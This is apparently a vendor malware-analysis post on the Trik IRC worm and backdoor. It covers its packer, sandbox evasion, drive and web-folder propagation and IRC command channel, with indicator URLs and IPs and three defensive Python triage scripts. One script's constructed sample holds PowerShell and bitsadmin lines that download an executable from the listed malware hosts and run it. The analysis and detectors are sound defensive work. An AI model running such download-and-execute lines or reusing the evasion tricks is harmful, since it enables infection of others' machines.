Over the past couple of months, Cyphort Labs identified a new version of the Trik bot. Our in-the-wild Top Threats tracking shows it to be one of the top threats in June and July. Trik is a worm that propagates through removable and network drives. It can also propagate by copying itself into web root folders, FTP folders, or other folders that are accessible online. It is also a backdoor that communicates via IRC. Other names for this bot are Backdoor:Win32/Kirts and Worm:Porphiex. Cyphort Labs did a deep-dive analysis of this malware.
Discovery
Trik is an old bot that was first seen in 2011. Its original modus operandi was to use instant messaging systems to propagate. Over the past few years the bot appeared to have gone quiet: from January to May 2016 we identified only 84 variants of Trik. However, from June to July 25 we identified 1,447 variants.
We discovered an early version of this bot on VirusTotal, first seen there on February 15, 2016. The sample with SHA-256 cdb6f46a56d97a962278960f4a58bbcd2270f27635f7c638884968ae44205931 has a compile timestamp of February 11, 2016. The sample is packed, with the compressed payload stored in its resource section.
We unpacked this file and identified the name and version of this bot from the .pdb path it references:
- C:\Users\x\Desktop\Home\Code\Trik v1.8\Release\Trik.pdb
Fast forward to July 2016: Trik now uses a .NET packer/protector, and the .pdb path shows it is now at version 2.6. In other words, from 2011 until May 2016 we only saw version 1.x updates of Trik, but starting in June the actors became actively involved in Trik's operations again.
Aside from the .NET protector, samples are now code-signed, though with a certificate that chains to an untrusted root CA, so the signature does not validate on a normal Windows install.


The following analysis focuses on the recent sample with SHA-256 0b6258dc856fb84d11d368d3c8a4d6b3a379297ab08efa89b3f1a6ea5f556558.
Packer
Similar to the first version, this .NET packer stores its compressed data in its resource section. It also has a loader that checks for sandbox and virtualization software before loading the payload.
The loader first decrypts its configuration from its resource section. The configuration is an array that defines the execution flow of the malware, including mutex names. Based on the configuration, it can also strip the mark-of-the-web from the downloaded file by deleting its Zone.Identifier alternate data stream. This suppresses the warning dialog Windows and browsers show for files downloaded from the internet, and indicates that the attackers use drive-by downloads as a means to install this bot.

Armoring
This variant also detects the following software, which are popular sandbox and network analysis tools:
- SandBoxie
- Fiddler
- Wireshark
- WPE

The configuration also identifies the process into which it will inject its code. It may choose from the following:
- vbc.exe
- RegAsm.exe
- AppLaunch.exe
- svchost.exe
- notepad.exe
- self
In our sample, it injects into itself: it launches a suspended copy of its own process and writes the payload into it.

The injected code is located in the resource section and is encrypted. Decryption is a rolling XOR, with the keys also defined in the configuration.

Main Payload
The unpacked code is not a .NET assembly but native C++ code. The version of this bot, identified from its .pdb reference, is v2.6:
- C:\Users\s\Desktop\Home\Code\Trik v2.6\Release\Trik.pdb
Similar to the earlier version, the unpacked code is straightforward.
It first runs its anti-analysis, anti-sandbox, and anti-virtualization checks. If any of them trigger, it uninstalls itself.

AntiVirtual

Blacklisted Processes

Blacklisted DLL

Blacklisted Window Names

Blacklisted File Name

Blacklisted File Path

Blacklisted User Names

“Tequilaboomboom” might be the user name the author preferred while developing the malware.
To check whether it has already infected the system, it looks for the mutex named “t71”. It also checks whether it is running as:
- %windir%\M-50504502689047502405034500693020490\winmgr.exe
If not, it creates a copy of itself at that path. It also adds itself to the Authorized Applications list in the Firewall Policy settings, creates autostart entries, and disables the Windows Defender service.
It then creates four threads that carry out the main payload routines.
Worm Routine on Removable and Network Drives
This is not a typical worming routine in which a copy of the malware is dropped into target folders or drives. Instead, it drops a script that downloads a copy, most likely an updated version, of Trik. This is another evasion technique: even if the current version of the malware is already detected, the infected drives that carry only the worm's script components have a chance to evade detection.
Trik first checks whether the download URLs are reachable by iterating over a list of URLs and trying to download the “.exe” into the temp folder. For the sample we checked, the download URLs were:
- http://124[.]158[.]10[.]82/t.exe
- http://125[.]212[.]217[.]30/t.exe
- http://220[.]181[.]87[.]80/t.exe
- http://125[.]212[.]217[.]33/t.exe
- http://210[.]211[.]116[.]246/t.exe
- http://host5050[.]ru/t.exe
- http://host5051[.]ru/t.exe
- http://ouefuguefhuwuhs[.]ru/t.exe
- http://uwgfusubwbusswf[.]ru/t.exe
After successful verification, it proceeds to find the target drives. It targets removable and remote (network) drives, except drives “A:” and “B:”.

Depending on the type of drive, it drops the following files:
- Autorun.inf
- DeviceManager.bat
- Manager.bat (if target drive is network drive)
- Manager.js (if target drive is removable)
- .lnk (shortcut file to Manager.js or Manager.bat)
Autorun.inf functions as an autostart: simply opening the drive executes the malware. It runs Manager.bat or Manager.js, which in turn executes DeviceManager.bat. DeviceManager.bat contains a PowerShell script that downloads and executes a copy or an update of Trik as %temp%\winupd.exe. As an additional evasion technique, it inserts random strings between the lines of the scripts. For example, the contents of autorun.inf are as follows:

Without the randomizer, the script contains only the following:

DeviceManager.bat executes a PowerShell script or launches bitsadmin.exe to download Trik. It contains the following (we removed the random strings to show clearly how the script works):

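The dropper's file set and the download step described above can be turned into a simple triage routine for a suspect drive. The following is an added example, not Cyphort's code and not the dropper text from the sample: it checks a drive root for the drop set (Autorun.inf, DeviceManager.bat, Manager.bat or Manager.js, a .lnk launcher) and pulls the download URL and the downloader (powershell or bitsadmin) out of the dropped scripts, ignoring the random filler lines Trik inserts. The sample drive, its script bodies and the filler lines are constructed for the demo.

```python
"""Triage helper for Trik's removable/network-drive dropper.

Added example; not Cyphort's code and not the dropper text from the sample.
It checks a drive root for the drop set named in the write-up (Autorun.inf,
DeviceManager.bat, Manager.bat or Manager.js, a .lnk launcher) and pulls the
download URL and the downloader (powershell or bitsadmin) out of the dropped
scripts, ignoring the random filler lines Trik inserts. The sample drive and
its script contents below are constructed for the demo.
"""
import os
import re
import tempfile

DROP_FILES = {"autorun.inf", "devicemanager.bat", "manager.bat", "manager.js"}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
DOWNLOADER_RE = re.compile(r"\b(powershell|bitsadmin)(?:\.exe)?\b", re.IGNORECASE)


def list_entries(drive_root):
    """Map lower-cased names to on-disk names: Windows compares case-
    insensitively, but the demo may run on a case-sensitive filesystem."""
    return {n.lower(): n for n in os.listdir(drive_root)}


def find_drop_set(drive_root):
    """Return (Trik drop files present, .lnk shortcuts present)."""
    entries = list_entries(drive_root)
    return set(entries) & DROP_FILES, {n for n in entries if n.endswith(".lnk")}


def is_trik_drive(drive_root):
    """Heuristic: autorun.inf plus DeviceManager.bat plus a launcher script."""
    found, _ = find_drop_set(drive_root)
    has_launcher = bool({"manager.bat", "manager.js"} & found)
    return {"autorun.inf", "devicemanager.bat"} <= found and has_launcher


def extract_iocs(script_text):
    """Pull URLs and downloader names out of a dropped script.

    Trik interleaves random filler lines; rather than model the filler we only
    keep what carries a URL or a downloader invocation."""
    urls, downloaders = [], set()
    for line in script_text.splitlines():
        urls.extend(m.group(0).rstrip(".,;") for m in URL_RE.finditer(line))
        downloaders.update(m.group(1).lower() for m in DOWNLOADER_RE.finditer(line))
    return urls, sorted(downloaders)


def triage(drive_root):
    """Verdict plus the IOCs recovered from the scripts on the drive."""
    entries = list_entries(drive_root)
    found, lnks = find_drop_set(drive_root)
    urls, downloaders = set(), set()
    for name in found:
        with open(os.path.join(drive_root, entries[name]), errors="replace") as fh:
            u, d = extract_iocs(fh.read())
        urls.update(u)
        downloaders.update(d)
    return {
        "trik_dropper": is_trik_drive(drive_root),
        "drop_files": sorted(found),
        "lnk_files": sorted(lnks),
        "urls": sorted(urls),
        "downloaders": sorted(downloaders),
    }


# --- constructed sample drive; filler lines and script bodies are made up ---
SAMPLE_DEVICEMANAGER_BAT = "\n".join([
    "@echo off",
    "rem x7Gq0PzLw",  # stand-in for Trik's random filler (constructed)
    "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
    "'http://host5050.ru/t.exe', $env:temp + '\\winupd.exe')\"",
    "rem Nv2TbRqa9",  # stand-in for Trik's random filler (constructed)
    "bitsadmin /transfer u /download /priority high "
    "http://124.158.10.82/t.exe %temp%\\winupd.exe",
    "start %temp%\\winupd.exe",
])


def build_sample_drive():
    """Write the constructed drop set into a temp dir standing in for a drive."""
    root = tempfile.mkdtemp(prefix="trik_drive_")
    files = {
        "Autorun.inf": "[autorun]\nopen=Manager.js\n",  # minimal, constructed
        "DeviceManager.bat": SAMPLE_DEVICEMANAGER_BAT,
        "Manager.js": "// constructed launcher stub that would run DeviceManager.bat\n",
        "Open.lnk": "",
    }
    for name, text in files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    print(triage(build_sample_drive()))
```

The URL and downloader regexes are deliberately loose so the filler lines do not matter; on a real drive you would feed the recovered URLs straight into blocking and retro-hunt, and keep the .lnk files as evidence since they are what the user actually double-clicks.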
Worm Routine on Fixed Drives
Aside from worming on removable and network drives, it also propagates a copy of itself into specific folders on fixed drives. It targets folders related to web roots, FTP folders, or other shared folders. Specifically, it looks for the following substrings in the folder path:

If found, for every “.exe” file in that folder it replaces the file with a copy of itself. Likewise, for every “.zip” or “.rar” archive in that folder it adds a copy of itself as “README.txt.scr”.
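Both behaviours leave a recognisable footprint: archives gain a double-extension .scr entry, and every .exe in the folder ends up byte-identical. The scanner below is an added example, not Cyphort's code. The exact path substrings Trik matches are not reproduced in this text, so the scan takes a caller-supplied list and the defaults are assumptions; the sample tree, archives and executable bodies are constructed for the demo.

```python
"""Scan for Trik's fixed-drive propagation artifacts.

Added example, not Cyphort's code. Per the write-up, in folders whose path
matches web-root/FTP/share substrings Trik overwrites every .exe with a copy
of itself and adds README.txt.scr to every .zip/.rar. The scan therefore flags
(1) archives containing a double-extension .scr entry and (2) folders where
several .exe files are byte-identical. ASSUMED_PATH_SUBSTRINGS is a guess at
the kind of list Trik carries, not the list from the sample.
"""
import hashlib
import os
import tempfile
import zipfile

ASSUMED_PATH_SUBSTRINGS = ("wwwroot", "htdocs", "ftp", "share")  # assumption
SUSPICIOUS_SCR = b"readme.txt.scr"  # name Trik adds to archives, per the write-up


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def is_double_ext_scr(name):
    base = os.path.basename(name).lower()
    return base.endswith(".scr") and base.count(".") >= 2


def archive_has_trik_payload(path):
    """.zip: inspect the central directory. .rar: fall back to a raw search,
    since RAR stores entry names in clear unless header encryption is used."""
    low = path.lower()
    if low.endswith(".zip"):
        with zipfile.ZipFile(path) as zf:
            return any(is_double_ext_scr(n) for n in zf.namelist())
    if low.endswith(".rar"):
        with open(path, "rb") as fh:
            return SUSPICIOUS_SCR in fh.read().lower()
    return False


def folder_is_targeted(folder, substrings=ASSUMED_PATH_SUBSTRINGS):
    low = folder.lower()
    return any(s in low for s in substrings)


def scan_folder(folder):
    """Findings for one folder: suspicious archives and groups of cloned exes."""
    findings = {"archives": [], "cloned_exes": []}
    by_hash = {}
    for name in os.listdir(folder):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        low = name.lower()
        if low.endswith((".zip", ".rar")) and archive_has_trik_payload(path):
            findings["archives"].append(name)
        elif low.endswith(".exe"):
            by_hash.setdefault(sha256_of(path), []).append(name)
    for digest, names in by_hash.items():
        if len(names) > 1:  # Trik replaces every .exe with the same body
            findings["cloned_exes"].append((digest, sorted(names)))
    findings["archives"].sort()
    return findings


def scan_tree(root, substrings=ASSUMED_PATH_SUBSTRINGS):
    """Walk a tree and return {folder: findings} for targeted folders with hits."""
    hits = {}
    for folder, _dirs, _files in os.walk(root):
        if folder_is_targeted(folder, substrings):
            f = scan_folder(folder)
            if f["archives"] or f["cloned_exes"]:
                hits[folder] = f
    return hits


# --- constructed sample tree; the "executable" bytes are a stand-in, not Trik ---
def build_sample_tree():
    root = tempfile.mkdtemp(prefix="trik_fixed_")
    web = os.path.join(root, "wwwroot", "downloads")
    os.makedirs(web)
    body = b"MZ-constructed-stand-in-for-trik\x00" * 8
    for exe in ("setup.exe", "tool.exe", "update.exe"):
        with open(os.path.join(web, exe), "wb") as fh:
            fh.write(body)
    with zipfile.ZipFile(os.path.join(web, "release.zip"), "w") as zf:
        zf.writestr("docs/manual.txt", "legit content")
        zf.writestr("README.txt.scr", body)
    with zipfile.ZipFile(os.path.join(web, "clean.zip"), "w") as zf:
        zf.writestr("readme.txt", "nothing to see")
    return root, web


if __name__ == "__main__":
    root, _web = build_sample_tree()
    for folder, f in scan_tree(root).items():
        print(folder, f)
```

The cloned-exe check is the more useful of the two in practice: a download folder whose every installer hashes to the same value is a strong signal even before the sample itself is identified, and the shared digest is the IOC to pivot on.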

Backdoor Routine
Trik is an IRC backdoor. The sample we analyzed connects to any of the following IRC servers, all on port 5050:
- 125.212.217.30
- 220.181.87.80
- 124.158.10.82
- 125.212.217.33
- 210.211.116.246
- host5050.ru
- host5051.ru
- ouefuguefhuwuhs.ru
- uwgfusubwbusswf.ru
- oeuuguhwugfuuws.ru
- efugusgdugugg.ru
- wdoaefaeodegfe.ru
- foeaufguehuaee.ru
- efuegdugugg.ru
- wdoargsiheffea.ru
- fofhihihienfospf.ru
- fgazeeufueea.ru
- wgwuwgruwddhuw.ru
If one of the IRC servers is online, the bot issues a NICK containing system information, followed by a USER command. The USER command has fixed parameters, always ‘x "" "x" :x’.
The NICK message contains system information including the Windows version, keyboard layout, and whether the user is an administrator.

If registration succeeds, it waits for specific commands. It looks for the strings “001”, “433”, and “332” in server messages as its signals; these are the IRC numerics RPL_WELCOME, ERR_NICKNAMEINUSE, and RPL_TOPIC. On 001 the bot joins a specific channel. On 433 the bot sends its system information again (the NICK carries that information, so this is effectively a re-registration with a fresh nick). The 332 message, the channel topic, carries the actual sub-command, which can instruct the bot to:
- Remove itself from the system
- Send more system information
- Download and execute files
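The registration exchange and the three numerics above make a compact network signature. The following is an added example, not Cyphort's code: it parses raw IRC lines (optional ":prefix", command, params, ":trailing"), flags the bot's fixed registration on the client side (a system-info NICK followed by USER x "" "x" :x) and the server numerics the bot reacts to, and combines that with the destination port into a verdict. The captured session is constructed; the NICK layout, channel name and topic text are assumptions, since the write-up does not reproduce them.

```python
"""IRC C2 triage for Trik.

Added example; not Cyphort's code. Parses raw IRC lines, detects Trik's fixed
registration (NICK with system info, then USER x "" "x" :x), classifies the
server numerics the bot acts on (001, 433, 332) and scores the session.
The sample session below is constructed; the NICK format, channel name and
topic text are assumptions, not values from the sample.
"""

C2_PORT = 5050
TRIK_USER_PARAMS = ["x", '""', '"x"']  # fixed USER parameters per the write-up
TRIK_USER_TRAILING = "x"
C2_NUMERICS = {
    "001": "RPL_WELCOME: bot joins its channel",
    "433": "ERR_NICKNAMEINUSE: bot resends a system-info NICK",
    "332": "RPL_TOPIC: topic carries the sub-command",
}


def parse_irc(line):
    """Split one IRC line into (prefix, command, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split(" ")
    return prefix, parts[0].upper(), parts[1:], trailing


def is_trik_registration(client_lines):
    """True when a NICK is followed by Trik's fixed USER line."""
    saw_nick = False
    for raw in client_lines:
        _, cmd, params, trailing = parse_irc(raw)
        if cmd == "NICK" and params:
            saw_nick = True
        elif cmd == "USER":
            return saw_nick and params == TRIK_USER_PARAMS and trailing == TRIK_USER_TRAILING
    return False


def classify_server_lines(server_lines):
    """List (numeric, meaning, trailing) for the server lines Trik acts on."""
    hits = []
    for raw in server_lines:
        _, cmd, _params, trailing = parse_irc(raw)
        if cmd in C2_NUMERICS:
            hits.append((cmd, C2_NUMERICS[cmd], trailing))
    return hits


def triage_session(client_lines, server_lines, dst_port):
    """Score one IRC session: the fixed USER line is the strongest signal;
    the port and a topic-delivered command add supporting evidence."""
    reg = is_trik_registration(client_lines)
    numerics = classify_server_lines(server_lines)
    topic_cmd = any(n == "332" for n, _, _ in numerics)
    score = 2 * reg + (dst_port == C2_PORT) + topic_cmd
    return {
        "registration_match": reg,
        "port_match": dst_port == C2_PORT,
        "server_numerics": numerics,
        "verdict": "likely Trik IRC C2" if score >= 3 else "not conclusive",
    }


# --- constructed session (NICK layout, channel and topic text are assumptions) ---
SAMPLE_CLIENT = [
    "NICK [Win7][en-US][admin]k3p9q\r\n",  # system-info style nick (constructed)
    'USER x "" "x" :x\r\n',                 # the fixed USER line from the write-up
    "JOIN #c\r\n",                          # channel name assumed
]
SAMPLE_SERVER = [
    ":irc.example 433 * [Win7][en-US][admin]k3p9q :Nickname is already in use.\r\n",
    ":irc.example 001 [Win7][en-US][admin]k3p9r :Welcome\r\n",
    ":irc.example 332 [Win7][en-US][admin]k3p9r #c :!dl http://host5050.ru/t.exe\r\n",  # topic text assumed
]

if __name__ == "__main__":
    print(triage_session(SAMPLE_CLIENT, SAMPLE_SERVER, 5050))
```

The fixed USER line is what to key a network rule on: legitimate clients send a real user name and realname, while every Trik bot sends the literal ‘x "" "x" :x’ regardless of host. Port 5050 and the topic-delivered command are corroboration, not the primary match, because both are easy for the operators to change.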
It also targets specific countries, geolocating the infected host through http://api.wipmania.com/. It only downloads for a list of countries hardcoded in its body; the list contains only countries in the Americas and Europe.
Cyphort detects Trik as TROJAN.KIRTS.CY
The post Trik: A Bot With A Lot Up Its Sleeve appeared first on Cyphort.